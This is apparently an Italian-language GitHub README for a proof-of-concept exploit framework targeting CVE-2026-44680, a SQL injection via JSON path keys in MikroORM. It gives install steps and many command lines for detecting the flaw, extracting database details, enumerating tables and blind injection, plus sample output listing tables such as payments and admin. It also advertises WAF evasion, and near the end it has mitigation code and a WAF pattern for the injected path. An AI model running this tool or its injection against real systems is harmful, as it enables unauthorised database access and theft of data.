
Strumento PoC per CVE-2026-44680 che interessa MikroORM ≤7.0.13. Sfrutta l'iniezione del percorso JSON per estrarre il contenuto del database tramite attacchi basati su UNION. Include rilevamento delle vulnerabilità, estrazione automatica dei dati, enumerazione delle tabelle e supporto per l'iniezione cieca. Comprende l'integrazione con il proxy di Burp Suite e tecniche di evasione WAF.
Strumento Proof-of-Concept professionale per ricercatori di sicurezza
CVE-2026-44680 è una vulnerabilità critica di SQL injection che colpisce MikroORM, un popolare ORM TypeScript per Node.js. Questo framework di exploit fornisce a ricercatori di sicurezza e penetration tester uno strumento professionale per rilevare e sfruttare la vulnerabilità.
Autore: Sudeepa Wanigarathna
Versione: 1.0.0
Classificazione: Strumento professionale per la ricerca sulla sicurezza
| Attributo | Valore |
|---|
| ID CVE | CVE-2026-44680 |
| Punteggio CVSS | 7.6 (Alto) |
| Vettore di attacco | Rete |
| Complessità dell'attacco | Bassa |
| Privilegi richiesti | Bassi |
@mikro-orm/knex <= 6.6.13@mikro-orm/sql <= 7.0.13MikroORM non riesce a eseguire correttamente l'escape delle chiavi di percorso JSON controllate a runtime durante la costruzione delle query JSON_EXTRACT. Gli attaccanti possono fuoriuscire dal contesto del percorso JSON e iniettare codice SQL arbitrario.
| Funzionalità | Descrizione | Stato |
|---|---|---|
| Rilevamento delle vulnerabilità | Rilevamento basato sul tempo e sugli errori | ✅ |
| Estrazione del database | Versione, database, utente, hostname | ✅ |
| Enumerazione delle tabelle | Scoperta automatica di tutte le tabelle | ✅ |
| Iniezione basata su UNION | Estrazione dei dati tramite UNION SELECT | ✅ |
| Iniezione cieca | Estrazione di caratteri basata su valori booleani | ✅ |
| Supporto proxy | Burp Suite / proxy di intercettazione | ✅ |
| Generazione di report | Report TXT professionali | ✅ |
| Evasione WAF | Tecniche avanzate di offuscamento | ✅ |
# Python 3.8 or higher
python3 --version
# pip package manager
pip --version
git clone https://github.com/CerberusMrXi/CVE-2026-44680-MikroORM-SQL-Injection-Exploit-Framework
cd CVE-2026-44680-exploit
# Using requirements.txt
pip install -r requirements.txt
# Or install manually
pip install requests colorama tqdm urllib3 simplejson
python exploit.py --help
requests>=2.31.0
colorama>=0.4.6
tqdm>=4.65.0
urllib3>=2.0.0
simplejson>=3.19.0
# Full exploitation
python exploit.py -u http://localhost:3000
# Vulnerability detection only
python exploit.py -u http://target.com --detect
# Extract database information
python exploit.py -u http://target.com --extract
# Enumerate tables
python exploit.py -u http://target.com --enumerate
| Flag | Descrizione | Predefinito |
|---|---|---|
-u, --url | URL di destinazione (obbligatorio) | - |
-e, --endpoint | Endpoint API | /api/users/search |
-p, --proxy | Proxy HTTP | Nessuno |
-v, --verbose | Output dettagliato | False |
--detect | Rileva solo la vulnerabilità | False |
--extract | Estrae le informazioni del database | False |
--enumerate | Enumera le tabelle | False |
--blind | Modalità di iniezione cieca | False |
python exploit.py -u http://192.168.1.100:3000
python exploit.py -u http://target.com -e /api/v2/users/query
python exploit.py -u http://target.com -p http://127.0.0.1:8080
python exploit.py -u http://target.com -v --extract
python exploit.py -u http://target.com --blind
python exploit.py -u http://target.com --detect
python exploit.py -u http://target.com --extract
python exploit.py -u http://target.com --enumerate
============================================================
MikroORM CVE-2026-44680 Exploitation Framework
Author: Sudeepa Wanigarathna
============================================================
[*] Performing vulnerability detection on /api/users/search
[+] Vulnerable to time-based SQL injection
[+] Vulnerability confirmed!
[*] Extracting database information...
[*] Enumerating tables...
[+] Found table: users
[+] Found table: products
[+] Found table: orders
[+] Found table: payments
[+] Found table: admin
===== MIKROORM CVE-2026-44680 EXPLOITATION REPORT =====
Author: Sudeepa Wanigarathna (Security Researcher)
Date: 2026-07-20 14:30:45
Target: http://localhost:3000
[*] VULNERABILITY DETAILS
- CVE: CVE-2026-44680
- CVSS Score: 7.6 (High)
- Affected Components: @mikro-orm/knex <= 6.6.13
[*] DATABASE INFORMATION
- Version: 10.11.6-MariaDB
- Database: production_db
- User: root@localhost
- Hostname: localhost
[*] ENUMERATED TABLES (5 found)
1. users
2. products
3. orders
4. payments
5. admin
[+] Report saved to exploit_report_1742493645.txt
[+] Table list saved to tables_1742493645.txt
exploit_report_1742493645.txt # Complete exploitation report
tables_1742493645.txt # List of discovered tables
npm install @mikro-orm/knex@latest
npm install @mikro-orm/sql@latest
const ALLOWED_JSON_PATHS = ['$.email', '$.name', '$.metadata'];
function validateJsonPath(key) {
if (!ALLOWED_JSON_PATHS.includes(key)) {
throw new Error('Invalid JSON path');
}
return key;
}
# Block suspicious JSON path patterns
"filterField": "\$\.x'\) OR .* -- "
IMPORTANTE: Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a scopi didattici.
Questo progetto è distribuito sotto la licenza MIT.
MIT License
Copyright (c) 2026 Sudeepa Wanigarathna
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
...
Realizzato con ❤️ per la community di ricerca sulla sicurezza
Segnala un bug • Richiedi una funzionalità • Assegna una stella su GitHub